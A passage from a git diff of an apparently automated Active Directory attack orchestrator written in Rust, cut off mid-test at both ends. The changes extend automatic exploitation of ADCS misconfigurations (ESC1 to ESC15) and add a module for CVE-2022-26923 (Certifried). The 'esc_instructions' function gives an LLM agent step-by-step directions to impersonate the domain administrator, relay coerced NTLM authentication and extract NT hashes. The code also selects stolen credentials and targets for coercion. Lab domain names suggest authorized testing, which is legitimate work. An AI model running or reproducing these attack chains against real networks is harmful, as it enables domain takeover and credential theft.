+ id: "c2".into(),
+ username: "admin2".into(),
+ password: "P@ssw0rd!".into(), // pragma: allowlist secret
+ domain: "fabrikam.local".into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ },
+ ];
+ let target_domain = "fabrikam.local";
+ let selected = creds.iter().find(|c| {
+ !c.password.is_empty() && c.domain.to_lowercase() == target_domain.to_lowercase()
+ });
+ assert!(selected.is_some());
+ assert_eq!(selected.unwrap().domain, "fabrikam.local");
+ }
}
diff --git a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
index 124c9c2f..e65cbb07 100644
--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -23,22 +23,48 @@ use crate::orchestrator::dispatcher::Dispatcher;
const DEDUP_ADCS_EXPLOIT: &str = "adcs_exploit";
/// ADCS vulnerability types we know how to exploit.
-const EXPLOITABLE_ESC_TYPES: &[&str] = &[
+/// ESC1/2/3/6: certipy req (enrollment-based, certipy_request tool)
+/// ESC4: certipy template modification (certipy_template_esc4 / certipy_esc4_full_chain)
+/// ESC7: ManageCA abuse (certipy_esc7_full_chain: add-officer → SubCA → issue → retrieve → auth)
+/// ESC8: NTLM relay to HTTP web enrollment (coercion role)
+/// ESC9/13: certipy req with specific flags
+/// ESC10: Weak certificate mapping (StrongCertificateBindingEnforcement=0), certipy req -sid
+/// ESC11: RPC relay to ICPR enrollment (certipy relay -target rpc://, coercion role)
+/// ESC15: Application policy OID abuse (certipy req -application-policies)
+pub(crate) const EXPLOITABLE_ESC_TYPES: &[&str] = &[
"esc1",
+ "esc2",
+ "esc3",
"esc4",
+ "esc6",
+ "esc7",
"esc8",
+ "esc9",
+ "esc10",
+ "esc11",
+ "esc13",
+ "esc15",
"adcs_esc1",
+ "adcs_esc2",
+ "adcs_esc3",
"adcs_esc4",
+ "adcs_esc6",
+ "adcs_esc7",
"adcs_esc8",
+ "adcs_esc9",
+ "adcs_esc10",
+ "adcs_esc11",
+ "adcs_esc13",
+ "adcs_esc15",
];
/// Monitors for discovered ADCS vulnerabilities and dispatches exploitation tasks.
-/// Interval: 30s.
+/// Interval: 5s.
pub async fn auto_adcs_exploitation(
dispatcher: Arc,
mut shutdown: watch::Receiver,
) {
- let mut interval = tokio::time::interval(Duration::from_secs(30));
+ let mut interval = tokio::time::interval(Duration::from_secs(5));
interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
loop {
@@ -104,44 +130,63 @@ pub async fn auto_adcs_exploitation(
.unwrap_or("")
.to_string();
- let ca_host = extract_ca_host(&vuln.details, &vuln.target);
+ let ca_host = extract_ca_host(&vuln.details, &vuln.target).or_else(|| {
+ // When the parser couldn't determine the CA host (empty target),
+ // resolve it from the CertEnroll share for this domain.
+ resolve_ca_host_from_shares(&state.shares, &state.hosts, &domain)
+ });
// For ESC4, we need the account with GenericAll on the template
let account_name = extract_account_name(&vuln.details);
// Find a credential for exploitation.
- // For ESC4, prefer the account that has GenericAll on the template.
- // For ESC1/ESC8, any authenticated user in the domain works.
- let credential = account_name
+ // For ESC4, prefer the account that has GenericAll on the
+ // template (it may live in a different domain than the CA
+ // — cross-forest ACL edge — so use the source-cred helper).
+ // For ESC1/ESC8/etc, any authenticated user in the CA's
+ // domain works; cross-forest ESC8 also accepts a credential
+ // from a trusting domain because the relay path doesn't
+ // need same-domain auth (the cert is issued to whatever
+ // principal lands on the relay).
+ let account_cred = account_name
.as_ref()
- .and_then(|acct| {
- state.credentials.iter().find(|c| {
- c.username.to_lowercase() == acct.to_lowercase()
- && (domain.is_empty()
- || c.domain.to_lowercase() == domain.to_lowercase())
+ .and_then(|acct| state.find_source_credential(acct, &domain));
+
+ let same_domain_cred = if !domain.is_empty() {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
})
- })
- .or_else(|| {
- // Fall back to any credential for this domain
- if !domain.is_empty() {
- state.credentials.iter().find(|c| {
- c.domain.to_lowercase() == domain.to_lowercase()
- && !c.password.is_empty()
- && !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- } else {
- state.credentials.iter().find(|c| {
- !c.password.is_empty()
- && !state.is_delegation_account(&c.username)
- && !state.is_credential_quarantined(&c.username, &c.domain)
- })
- }
- })
- .cloned();
+ .cloned()
+ } else {
+ state
+ .credentials
+ .iter()
+ .find(|c| {
+ !c.password.is_empty()
+ && !c.username.starts_with('$')
+ && !state.is_delegation_account(&c.username)
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ })
+ .cloned()
+ };
+
+ let trust_cred = if same_domain_cred.is_none() && !domain.is_empty() {
+ state.find_trust_credential(&domain)
+ } else {
+ None
+ };
+
+ let credential = account_cred.or(same_domain_cred).or(trust_cred);
if credential.is_none() {
- debug!(
+ info!(
vuln_id = %vuln.vuln_id,
esc_type = %esc_type,
"ADCS exploit skipped: no credential available"
@@ -154,6 +199,22 @@ pub async fn auto_adcs_exploitation(
.get(&domain.to_lowercase())
.cloned();
+ let domain_sid = state.domain_sids.get(&domain.to_lowercase()).cloned();
+
+ // For coercion-based ESC paths (esc8/esc11), build a
+ // tier-ordered candidate list of coerce targets so the LLM
+ // agent can iterate when the first one's callback drifts.
+ let coerce_candidates = if matches!(esc_type.as_str(), "esc8" | "esc11") {
+ pick_coerce_targets(
+ ca_host.as_deref(),
+ dc_ip.as_deref(),
+ &state.domain_controllers,
+ &state.hosts,
+ )
+ } else {
+ Vec::new()
+ };
+
Some(AdcsExploitWork {
vuln_id: vuln.vuln_id.clone(),
dedup_key,
@@ -163,13 +224,49 @@ pub async fn auto_adcs_exploitation(
ca_host,
domain,
dc_ip,
+ domain_sid,
credential,
+ coerce_candidates,
})
})
.collect()
};
for item in work {
+ let role = role_for_esc_type(&item.esc_type);
+
+ // Coercion-based ESC paths (ESC8, ESC11) need a relay listener and
+ // a coerce target that is not the CA itself — Windows NTLM
+ // same-machine loopback protection blocks relay back to the
+ // coerced host. Without these, the dispatched task cannot succeed.
+ let (coerce_target, coerce_targets, listener_ip) = if role == "coercion" {
+ let listener = match dispatcher.config.listener_ip.as_deref() {
+ Some(ip) => ip.to_string(),
+ None => {
+ debug!(
+ vuln_id = %item.vuln_id,
+ esc_type = %item.esc_type,
+ "ADCS coercion exploit skipped: no listener_ip configured"
+ );
+ continue;
+ }
+ };
+ if item.coerce_candidates.is_empty() {
+ debug!(
+ vuln_id = %item.vuln_id,
+ esc_type = %item.esc_type,
+ ca_host = ?item.ca_host,
+ "ADCS coercion exploit skipped: no coerce target distinct from ca_host"
+ );
+ continue;
+ }
+ let primary = item.coerce_candidates[0].clone();
+ let all = item.coerce_candidates.clone();
+ (Some(primary), Some(all), Some(listener))
+ } else {
+ (None, None, None)
+ };
+
let mut payload = json!({
"technique": format!("adcs_{}", item.esc_type),
"vuln_type": format!("adcs_{}", item.esc_type),
@@ -177,6 +274,7 @@ pub async fn auto_adcs_exploitation(
"esc_type": item.esc_type,
"domain": item.domain,
"impersonate": "administrator",
+ "instructions": esc_instructions(&item.esc_type),
});
if let Some(ref ca) = item.ca_name {
@@ -192,6 +290,23 @@ pub async fn auto_adcs_exploitation(
if let Some(ref dc) = item.dc_ip {
payload["dc_ip"] = json!(dc);
}
+ if let Some(ref sid) = item.domain_sid {
+ payload["domain_sid"] = json!(sid);
+ // Administrator RID is always 500
+ payload["admin_sid"] = json!(format!("{sid}-500"));
+ }
+
+ if let Some(ref ip) = listener_ip {
+ payload["listener_ip"] = json!(ip);
+ }
+ if let Some(ref t) = coerce_target {
+ payload["coerce_target"] = json!(t);
+ }
+ if let Some(ref ts) = coerce_targets {
+ if !ts.is_empty() {
+ payload["coerce_targets"] = json!(ts);
+ }
+ }
if let Some(ref cred) = item.credential {
payload["username"] = json!(cred.username);
@@ -203,10 +318,6 @@ pub async fn auto_adcs_exploitation(
});
}
- // ESC8 uses coercion+relay, dispatch to coercion role.
- // ESC1/ESC4 use certipy directly, dispatch to privesc role.
- let role = role_for_esc_type(&item.esc_type);
-
let priority = dispatcher.effective_priority(&format!("adcs_{}", item.esc_type));
match dispatcher
.throttled_submit("exploit", role, payload, priority)
@@ -300,13 +411,190 @@ fn extract_account_name(
.map(|s| s.to_string())
}
+/// Resolve CA host IP from CertEnroll shares when the vuln has no target.
+/// Looks for a CertEnroll share whose host belongs to the given domain.
+/// Falls back to any CertEnroll share if no domain-matched share is found.
+fn resolve_ca_host_from_shares(
+ shares: &[ares_core::models::Share],
+ hosts: &[ares_core::models::Host],
+ domain: &str,
+) -> Option {
+ let certenroll_shares: Vec<_> = shares
+ .iter()
+ .filter(|s| s.name.to_lowercase() == "certenroll")
+ .collect();
+
+ if certenroll_shares.is_empty() {
+ return None;
+ }
+
+ // Try domain-matched share first
+ if !domain.is_empty() {
+ let domain_lower = domain.to_lowercase();
+ if let Some(s) = certenroll_shares.iter().find(|s| {
+ hosts.iter().any(|h| {
+ (h.ip == s.host || h.hostname.to_lowercase() == s.host.to_lowercase())
+ && h.hostname.to_lowercase().ends_with(&domain_lower)
+ })
+ }) {
+ return Some(s.host.clone());
+ }
+ }
+
+ // Fall back to any CertEnroll share (likely the CA for this environment)
+ certenroll_shares.first().map(|s| s.host.clone())
+}
+
+/// Build a tier-ordered list of viable coerce targets for ESC8/ESC11,
+/// excluding the CA host (Windows NTLM same-machine loopback blocks relay
+/// back to the coerced host). Tiers: (1) the vuln-domain DC, (2) any other
+/// DCs in state, (3) Windows member servers in state. The agent iterates
+/// the list when an earlier candidate's callback drifts (a real lab
+/// failure mode — see `relay_and_coerce_validation.md`). Comparison against
+/// `ca_host` is case-insensitive.
+fn pick_coerce_targets(
+ ca_host: Option<&str>,
+ dc_ip: Option<&str>,
+ domain_controllers: &std::collections::HashMap,
+ hosts: &[ares_core::models::Host],
+) -> Vec {
+ let ca_lower = ca_host.map(str::to_lowercase);
+ let mut out: Vec = Vec::new();
+ let push_unique = |out: &mut Vec, candidate: &str| {
+ if candidate.is_empty() {
+ return;
+ }
+ let cand_lower = candidate.to_lowercase();
+ if ca_lower.as_deref() == Some(cand_lower.as_str()) {
+ return;
+ }
+ if !out.iter().any(|e| e.to_lowercase() == cand_lower) {
+ out.push(candidate.to_string());
+ }
+ };
+
+ // Tier 1: vuln-domain DC.
+ if let Some(dc) = dc_ip {
+ push_unique(&mut out, dc);
+ }
+ // Tier 2: other DCs in state (cross-domain coercion is fine for ESC8 —
+ // the CA accepts any authenticated machine account).
+ for ip in domain_controllers.values() {
+ push_unique(&mut out, ip);
+ }
+ // Tier 3: Windows member servers (bypass DC callback drift). We check
+ // both the OS string and SMB service exposure since `os` is not always
+ // populated.
+ for h in hosts {
+ if h.is_dc {
+ continue;
+ }
+ let is_windows = h.os.to_lowercase().contains("windows")
+ || h.services.iter().any(|s| {
+ let s = s.to_lowercase();
+ s.contains("microsoft-ds") || s.contains("netbios-ssn")
+ });
+ if is_windows {
+ push_unique(&mut out, &h.ip);
+ }
+ }
+
+ out
+}
+
/// Determine the dispatch role for a given ESC type.
-/// ESC8 uses coercion+relay (coercion role), while ESC1/ESC4 use certipy directly (privesc role).
+/// ESC8 uses coercion+relay (coercion role), while all others use certipy directly (privesc role).
fn role_for_esc_type(esc_type: &str) -> &'static str {
- if esc_type == "esc8" {
- "coercion"
- } else {
- "privesc"
+ match esc_type {
+ "esc8" | "esc11" => "coercion",
+ _ => "privesc",
+ }
+}
+
+/// Return ESC-type-specific exploitation instructions for the LLM agent.
+fn esc_instructions(esc_type: &str) -> &'static str {
+ match esc_type {
+ "esc1" => concat!(
+ "ESC1: Enrollee supplies Subject Alternative Name (SAN).\n",
+ "Use certipy_request with template, ca (CA name), upn='administrator@',\n",
+ "dc_ip (domain controller), target (CA server IP from ca_host field),\n",
+ "and sid (use admin_sid from payload, e.g. S-1-5-21-...-500).\n",
+ "IMPORTANT: The 'target' param MUST be the CA server (ca_host), NOT the DC.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+ "Then use certipy_auth with the resulting .pfx to get the NT hash."
+ ),
+ "esc2" => concat!(
+ "ESC2: Any Purpose EKU allows client auth.\n",
+ "Use certipy_request with template, ca, dc_ip, target=ca_host, and sid=admin_sid.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch in certipy_auth.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc3" => concat!(
+ "ESC3: Certificate Request Agent (enrollment agent).\n",
+ "Step 1: certipy_request the CRA template with target=ca_host.\n",
+ "Step 2: Use that cert to request a cert on behalf of administrator.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+ ),
+ "esc4" => concat!(
+ "ESC4: Template ACL abuse — attacker has GenericAll on a template.\n",
+ "Use certipy_esc4_full_chain which modifies the template to be ESC1-vulnerable,\n",
+ "requests a cert as administrator, then restores the original template.\n",
+ "IMPORTANT: Set target to the ca_host IP for certificate enrollment."
+ ),
+ "esc6" => concat!(
+ "ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 flag on the CA.\n",
+ "Use certipy_request with any template that allows client auth,\n",
+ "adding upn='administrator@', target=ca_host, and sid=admin_sid.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "IMPORTANT: Include 'sid' param (admin_sid) to avoid SID mismatch.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc7" => concat!(
+ "ESC7: ManageCA privilege abuse.\n",
+ "Use certipy_esc7_full_chain to execute the full chain: add-officer → request SubCA cert (denied) → issue pending request → retrieve cert → authenticate.\n",
+ "IMPORTANT: Set target to the ca_host IP (CA server, not DC).\n",
+ "IMPORTANT: Include 'sid' param (admin_sid from payload) to avoid SID mismatch in certipy v5.\n",
+ "The tool handles all 5 steps automatically and returns the NT hash."
+ ),
+ "esc9" => concat!(
+ "ESC9: GenericAll on a user allows UPN spoofing.\n",
+ "If you have GenericAll on a user, change their UPN to administrator@,\n",
+ "request a cert using the modified user, then restore the original UPN.\n",
+ "Use certipy_request (with target=ca_host) then certipy_auth.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
+ ),
+ "esc10" => concat!(
+ "ESC10: Weak Certificate Mapping (StrongCertificateBindingEnforcement=0).\n",
+ "The DC does not enforce strong cert-to-account binding.\n",
+ "Use certipy_request with template, ca, target=ca_host, and sid=admin_sid.\n",
+ "The -sid flag embeds the target SID in the cert, bypassing weak mapping.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc11" => concat!(
+ "ESC11: RPC relay to ICPR certificate enrollment (IF_ENFORCEENCRYPTICERTREQUEST disabled).\n",
+ "Use certipy_relay with target='rpc://' and ca=.\n",
+ "This starts a relay listener that accepts coerced NTLM auth and relays it\n",
+ "to the CA's RPC enrollment endpoint to obtain a certificate.\n",
+ "Combine with coercion (PetitPotam, PrinterBug) to trigger auth from a DC.\n",
+ "After relay captures a cert, use certipy_auth with the .pfx."
+ ),
+ "esc13" => concat!(
+ "ESC13: Issuance Policy linked to a group.\n",
+ "Use certipy_request with the ESC13 template and target=ca_host.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ "esc15" => concat!(
+ "ESC15 (CVE-2024-49019): Application policy OID abuse.\n",
+ "Use certipy_request with template, ca, target=ca_host,\n",
+ "and application_policies= (e.g. '1.3.6.1.5.5.7.3.2' for Client Authentication).\n",
+ "The application policy OID overrides the template's EKU restrictions.\n",
+ "IMPORTANT: Set target to the ca_host IP, not the dc_ip.\n",
+ "Then use certipy_auth with the resulting .pfx."
+ ),
+ _ => "Use certipy_request with the template and CA, then certipy_auth with the .pfx. Set target to ca_host.",
}
}
@@ -319,7 +607,13 @@ struct AdcsExploitWork {
ca_host: Option,
domain: String,
dc_ip: Option,
+ domain_sid: Option,
credential: Option,
+ /// Tier-ordered coerce target candidates (esc8/esc11 only). Empty for
+ /// non-coercion ESC types. The dispatcher passes the first as
+ /// `coerce_target` (legacy) and the full list as `coerce_targets` so the
+ /// agent can iterate when the first target's callback drifts.
+ coerce_candidates: Vec,
}
#[cfg(test)]
@@ -353,11 +647,29 @@ mod tests {
#[test]
fn is_exploitable_esc_type_positive() {
assert!(is_exploitable_esc_type("esc1"));
+ assert!(is_exploitable_esc_type("esc2"));
+ assert!(is_exploitable_esc_type("esc3"));
assert!(is_exploitable_esc_type("esc4"));
+ assert!(is_exploitable_esc_type("esc6"));
+ assert!(is_exploitable_esc_type("esc7"));
assert!(is_exploitable_esc_type("esc8"));
+ assert!(is_exploitable_esc_type("esc9"));
+ assert!(is_exploitable_esc_type("esc10"));
+ assert!(is_exploitable_esc_type("esc11"));
+ assert!(is_exploitable_esc_type("esc13"));
+ assert!(is_exploitable_esc_type("esc15"));
assert!(is_exploitable_esc_type("adcs_esc1"));
+ assert!(is_exploitable_esc_type("adcs_esc2"));
+ assert!(is_exploitable_esc_type("adcs_esc3"));
assert!(is_exploitable_esc_type("adcs_esc4"));
+ assert!(is_exploitable_esc_type("adcs_esc6"));
+ assert!(is_exploitable_esc_type("adcs_esc7"));
assert!(is_exploitable_esc_type("adcs_esc8"));
+ assert!(is_exploitable_esc_type("adcs_esc9"));
+ assert!(is_exploitable_esc_type("adcs_esc10"));
+ assert!(is_exploitable_esc_type("adcs_esc11"));
+ assert!(is_exploitable_esc_type("adcs_esc13"));
+ assert!(is_exploitable_esc_type("adcs_esc15"));
}
#[test]
@@ -370,13 +682,13 @@ mod tests {
#[test]
fn is_exploitable_esc_type_negative() {
- assert!(!is_exploitable_esc_type("esc2"));
- assert!(!is_exploitable_esc_type("esc3"));
+ assert!(!is_exploitable_esc_type("esc5"));
+ assert!(!is_exploitable_esc_type("esc14"));
assert!(!is_exploitable_esc_type("rbcd"));
assert!(!is_exploitable_esc_type("shadow_credentials"));
assert!(!is_exploitable_esc_type("genericall"));
assert!(!is_exploitable_esc_type(""));
- assert!(!is_exploitable_esc_type("adcs_esc2"));
+ assert!(!is_exploitable_esc_type("adcs_esc5"));
}
// normalize_esc_type
@@ -709,6 +1021,11 @@ mod tests {
assert_eq!(role_for_esc_type("esc8"), "coercion");
}
+ #[test]
+ fn role_for_esc11_is_coercion() {
+ assert_eq!(role_for_esc_type("esc11"), "coercion");
+ }
+
#[test]
fn role_for_esc1_is_privesc() {
assert_eq!(role_for_esc_type("esc1"), "privesc");
@@ -719,6 +1036,16 @@ mod tests {
assert_eq!(role_for_esc_type("esc4"), "privesc");
}
+ #[test]
+ fn role_for_esc10_is_privesc() {
+ assert_eq!(role_for_esc_type("esc10"), "privesc");
+ }
+
+ #[test]
+ fn role_for_esc15_is_privesc() {
+ assert_eq!(role_for_esc_type("esc15"), "privesc");
+ }
+
#[test]
fn role_for_unknown_defaults_to_privesc() {
assert_eq!(role_for_esc_type("esc99"), "privesc");
@@ -830,4 +1157,130 @@ mod tests {
);
assert_eq!(extract_account_name(&details), None);
}
+
+ // pick_coerce_targets
+
+ fn windows_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: "Windows Server 2019".to_string(),
+ roles: Vec::new(),
+ services: vec!["microsoft-ds".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ fn dc_host(ip: &str, hostname: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: hostname.to_string(),
+ os: "Windows Server 2019".to_string(),
+ roles: Vec::new(),
+ services: vec!["microsoft-ds".to_string()],
+ is_dc: true,
+ owned: false,
+ }
+ }
+
+ fn linux_host(ip: &str) -> ares_core::models::Host {
+ ares_core::models::Host {
+ ip: ip.to_string(),
+ hostname: format!("linux-{ip}"),
+ os: "Ubuntu 22.04".to_string(),
+ roles: Vec::new(),
+ services: vec!["ssh".to_string()],
+ is_dc: false,
+ owned: false,
+ }
+ }
+
+ #[test]
+ fn pick_coerce_targets_prefers_vuln_domain_dc() {
+ let dcs: HashMap =
+ [("contoso.local".to_string(), "192.168.58.20".to_string())]
+ .into_iter()
+ .collect();
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &[]);
+ assert_eq!(out, vec!["192.168.58.20".to_string()]);
+ }
+
+ #[test]
+ fn pick_coerce_targets_excludes_ca_host() {
+ let dcs: HashMap =
+ [("contoso.local".to_string(), "192.168.58.10".to_string())]
+ .into_iter()
+ .collect();
+ let out = pick_coerce_targets(
+ Some("192.168.58.10"),
+ Some("192.168.58.10"),
+ &dcs,
+ &[windows_host("192.168.58.10", "ca-and-dc")],
+ );
+ assert!(out.is_empty(), "CA host must not appear: {out:?}");
+ }
+
+ #[test]
+ fn pick_coerce_targets_falls_back_to_member_servers() {
+ let dcs: HashMap =
+ [("contoso.local".to_string(), "192.168.58.10".to_string())]
+ .into_iter()
+ .collect();
+ let hosts = vec![
+ dc_host("192.168.58.10", "dc01"),
+ windows_host("192.168.58.51", "ws01"),
+ linux_host("192.168.58.99"),
+ ];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.10"), &dcs, &hosts);
+ // CA excluded; only Windows non-DC member server remains.
+ assert_eq!(out, vec!["192.168.58.51".to_string()]);
+ }
+
+ #[test]
+ fn pick_coerce_targets_orders_dc_then_other_dcs_then_members() {
+ let dcs: HashMap = [
+ ("contoso.local".to_string(), "192.168.58.20".to_string()),
+ ("fabrikam.local".to_string(), "192.168.58.30".to_string()),
+ ]
+ .into_iter()
+ .collect();
+ let hosts = vec![windows_host("192.168.58.51", "ws01")];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+ // Tier 1 (vuln-domain DC) first.
+ assert_eq!(out[0], "192.168.58.20");
+ // Tier 2 (other DC) and Tier 3 (member) both present, no CA.
+ assert!(out.contains(&"192.168.58.30".to_string()));
+ assert!(out.contains(&"192.168.58.51".to_string()));
+ assert!(!out.contains(&"192.168.58.10".to_string()));
+ }
+
+ #[test]
+ fn pick_coerce_targets_dedups_dc_appearing_in_hosts_list() {
+ let dcs: HashMap =
+ [("contoso.local".to_string(), "192.168.58.20".to_string())]
+ .into_iter()
+ .collect();
+ let hosts = vec![dc_host("192.168.58.20", "dc01")];
+ let out = pick_coerce_targets(Some("192.168.58.10"), Some("192.168.58.20"), &dcs, &hosts);
+ assert_eq!(out, vec!["192.168.58.20".to_string()]);
+ }
+
+ #[test]
+ fn pick_coerce_targets_ca_match_is_case_insensitive() {
+ let dcs: HashMap = HashMap::new();
+ let hosts = vec![windows_host("DC01.contoso.local", "dc01")];
+ let out = pick_coerce_targets(Some("dc01.contoso.local"), None, &dcs, &hosts);
+ assert!(
+ out.is_empty(),
+ "CA hostname (case-mismatched) must be excluded"
+ );
+ }
+
+ #[test]
+ fn pick_coerce_targets_empty_when_no_inputs() {
+ let dcs: HashMap = HashMap::new();
+ let out = pick_coerce_targets(Some("192.168.58.10"), None, &dcs, &[]);
+ assert!(out.is_empty());
+ }
}
diff --git a/ares-cli/src/orchestrator/automation/bloodhound.rs b/ares-cli/src/orchestrator/automation/bloodhound.rs
index 8b805cea..f2c1342c 100644
--- a/ares-cli/src/orchestrator/automation/bloodhound.rs
+++ b/ares-cli/src/orchestrator/automation/bloodhound.rs
@@ -40,7 +40,7 @@ pub async fn auto_bloodhound(dispatcher: Arc, mut shutdown: watch::R
.iter()
.filter(|d| !state.is_processed(DEDUP_BLOODHOUND_DOMAINS, d))
.filter_map(|domain| {
- let dc_ip = state.domain_controllers.get(domain).cloned()?;
+ let dc_ip = state.resolve_dc_ip(domain)?;
// Select best credential for this specific domain
let cred = find_domain_credential(
domain,
diff --git a/ares-cli/src/orchestrator/automation/certifried.rs b/ares-cli/src/orchestrator/automation/certifried.rs
new file mode 100644
index 00000000..ed15806d
--- /dev/null
+++ b/ares-cli/src/orchestrator/automation/certifried.rs
@@ -0,0 +1,485 @@
+//! auto_certifried -- CVE-2022-26923 machine account DNS hostname spoofing.
+//!
+//! Certifried abuses the fact that machine accounts can enroll for certificates
+//! and the DNS hostname in the certificate is derived from the machine account's
+//! dNSHostName attribute. By creating a machine account and setting its
+//! dNSHostName to a DC's hostname, you can obtain a certificate that
+//! authenticates as the DC.
+//!
+//! Prerequisites:
+//! - MachineAccountQuota > 0 (default 10)
+//! - Valid domain credential
+//! - ADCS CA discovered
+//!
+//! Dispatches to "privesc" role with technique "certifried".
+
+use std::sync::Arc;
+use std::time::Duration;
+
+use serde_json::json;
+use tokio::sync::watch;
+use tracing::{debug, info, warn};
+
+use crate::orchestrator::dispatcher::Dispatcher;
+use crate::orchestrator::state::*;
+
+/// Collect certifried work items from current state.
+///
+/// Pure logic extracted from `auto_certifried` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_certifried_work(state: &StateInner) -> Vec {
+ if state.credentials.is_empty() {
+ return Vec::new();
+ }
+
+ let mut items = Vec::new();
+
+ for (domain, dc_ip) in &state.all_domains_with_dcs() {
+ let dedup_key = format!("certifried:{}", domain.to_lowercase());
+ if state.is_processed(DEDUP_CERTIFRIED, &dedup_key) {
+ continue;
+ }
+
+ // Find the DC host to get its hostname for spoofing
+ let dc_hostname = state
+ .hosts
+ .iter()
+ .find(|h| h.ip == *dc_ip && h.is_dc)
+ .map(|h| h.hostname.clone())
+ .filter(|h| !h.is_empty());
+
+ // Certifried creates a machine account in the TARGET domain via MAQ.
+ // Cross-forest credentials cannot create machine accounts in a foreign
+ // forest, so require a credential whose domain matches the target.
+ let cred = match state.credentials.iter().find(|c| {
+ c.domain.to_lowercase() == domain.to_lowercase()
+ && !c.password.is_empty()
+ && !state.is_credential_quarantined(&c.username, &c.domain)
+ }) {
+ Some(c) => c.clone(),
+ None => continue,
+ };
+
+ items.push(CertifriedWork {
+ dedup_key,
+ domain: domain.clone(),
+ dc_ip: dc_ip.clone(),
+ dc_hostname,
+ credential: cred,
+ });
+ }
+
+ items
+}
+
+/// Dispatches certifried (CVE-2022-26923) per domain with ADCS.
+/// Interval: 45s.
+pub async fn auto_certifried(dispatcher: Arc, mut shutdown: watch::Receiver) {
+ let mut interval = tokio::time::interval(Duration::from_secs(45));
+ interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+ loop {
+ tokio::select! {
+ _ = interval.tick() => {},
+ _ = shutdown.changed() => break,
+ }
+ if *shutdown.borrow() {
+ break;
+ }
+
+ if !dispatcher.is_technique_allowed("certifried") {
+ continue;
+ }
+
+ let work = {
+ let state = dispatcher.state.read().await;
+ collect_certifried_work(&state)
+ };
+
+ for item in work {
+ let payload = json!({
+ "technique": "certifried",
+ "cve": "CVE-2022-26923",
+ "target_ip": item.dc_ip,
+ "domain": item.domain,
+ "dc_hostname": item.dc_hostname,
+ "credential": {
+ "username": item.credential.username,
+ "password": item.credential.password,
+ "domain": item.credential.domain,
+ },
+ });
+
+ let priority = dispatcher.effective_priority("certifried");
+ match dispatcher
+ .throttled_submit("exploit", "privesc", payload, priority)
+ .await
+ {
+ Ok(Some(task_id)) => {
+ info!(
+ task_id = %task_id,
+ domain = %item.domain,
+ dc = %item.dc_ip,
+ "Certifried (CVE-2022-26923) dispatched"
+ );
+ dispatcher
+ .state
+ .write()
+ .await
+ .mark_processed(DEDUP_CERTIFRIED, item.dedup_key.clone());
+ let _ = dispatcher
+ .state
+ .persist_dedup(&dispatcher.queue, DEDUP_CERTIFRIED, &item.dedup_key)
+ .await;
+ }
+ Ok(None) => {
+ debug!(domain = %item.domain, "Certifried deferred");
+ }
+ Err(e) => {
+ warn!(err = %e, domain = %item.domain, "Failed to dispatch certifried");
+ }
+ }
+ }
+ }
+}
+
+struct CertifriedWork {
+ dedup_key: String,
+ domain: String,
+ dc_ip: String,
+ dc_hostname: Option,
+ credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use ares_core::models::{Credential, Host};
+
+ fn make_credential(username: &str, password: &str, domain: &str) -> Credential {
+ Credential {
+ id: format!("c-{username}"),
+ username: username.into(),
+ password: password.into(), // pragma: allowlist secret
+ domain: domain.into(),
+ source: "test".into(),
+ is_admin: false,
+ discovered_at: None,
+ parent_id: None,
+ attack_step: 0,
+ }
+ }
+
+ fn make_host(ip: &str, hostname: &str, is_dc: bool) -> Host {
+ Host {
+ ip: ip.into(),
+ hostname: hostname.into(),
+ os: String::new(),
+ roles: Vec::new(),
+ services: Vec::new(),
+ is_dc,
+ owned: false,
+ }
+ }
+
+ // --- collect_certifried_work tests ---
+
+ #[test]
+ fn collect_empty_state_returns_no_work() {
+ let state = StateInner::new("test-op".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_no_credentials_returns_no_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ let work = collect_certifried_work(&state);
+ assert!(work.is_empty());
+ }
+
+ #[test]
+ fn collect_single_domain_produces_work() {
+ let mut state = StateInner::new("test-op".into());
+ state
+ .domain_controllers
+ .insert("contoso.local".into(), "192.168.58.10".into());
+ state
+ .credentials
